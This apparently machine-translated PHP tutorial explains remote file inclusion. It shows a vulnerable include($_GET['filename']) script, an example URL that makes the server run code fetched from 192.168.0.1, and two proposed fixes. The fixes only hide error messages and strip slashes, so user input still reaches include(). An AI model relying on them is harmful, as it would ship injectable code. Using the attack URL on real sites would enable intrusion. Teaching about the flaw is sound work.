PHP network development detailed explanation of remote file inclusion vulnerability_PHP tutorial

The following code (Code) implements the function of including different files based on the file name of the browser address bar parameter.

Copy code The code is as follows:

$file_name = $_GET["filename"]; //Get the current file name
include("$file_name "); //Include the file
//Some other operations
?>

At this time, through the address By specifying different file names on the column, you can implement the function of including and executing different files. For example, by accessing http://localhost/test.php?filename=myinc.php on the browser, the myinc.php file can be included and executed in the code.
Since the above code (Code) does not perform any error handling and is run without parameters on the browser, the following results will be obtained.
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:Program FilesxampphtdocsBugstest6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:Program Filesxamppphppear') in C:Program FilesxampphtdocsBugstest6.php on line 3
By reading this error message, visitors can know that the current operation is A file contains operations. At this time, you can place a corresponding script code on your own server. It should be noted that when PHP obtains a remote file, it obtains the final output of the remote server, not the file itself. The script code is located on the 192.168.0.1 server. The file name is hello.txt. The script code (Code) is as follows.

Copy code The code is as follows:

echo "hello world!";
? >

At this time, you can run hello.txt by accessing http://localhost/test.php?filename=http://192.168.0.1/hello.txt in the browser script.
To solve this problem, one way is to improve the error message of the code so that visitors cannot know that the current script is including the file specified in the parameter. The modified code (Code) is as follows.

Copy code The code is as follows:

$file_name = $_GET["filename"]; //Get the current file name
if(!@include("$file_name.php")) //Include the file
{
die("An error occurred while browsing the page");
}
//Some other operations
?>

After modification, if the included file cannot be found, the error message "An error occurred during browsing" will appear. , visitors will not be able to obtain the specific operation information of the current page.
The second method can more effectively prevent remote file inclusion attacks. The method is to replace the slash "/" in the address bar parameter. This way, when entering the remote file address in the address bar parameter, the code will not get the parameter correctly. The modified code (Code) is as follows.

Copy code The code is as follows:

$file_name = str_replace('/', '' , $_GET["filename"]); //Get the current file name
if(!@include("$file_name.php")) //Include the file
{
die("The page is browsing An error occurred during the process");
}
//Some other operations
?>

In this way, access http://localhost/test.php in the browser ?filename=http://192.168.0.1/hello.txt, actually the included file name obtained by the PHP code (Code) is http:192.168.0.1bugstest6_test. The page will not contain the remote file and an appropriate error message will be displayed.

http://www.bkjia.com/PHPjc/321704.htmlwww.bkjia.comtruehttp: //www.bkjia.com/PHPjc/321704.htmlTechArticleThe following code (Code) implements the function of including different files according to the file name of the browser address bar parameters. Copy the code The code is as follows: ?php $file_name = $_GET["filename"]; //Get the current...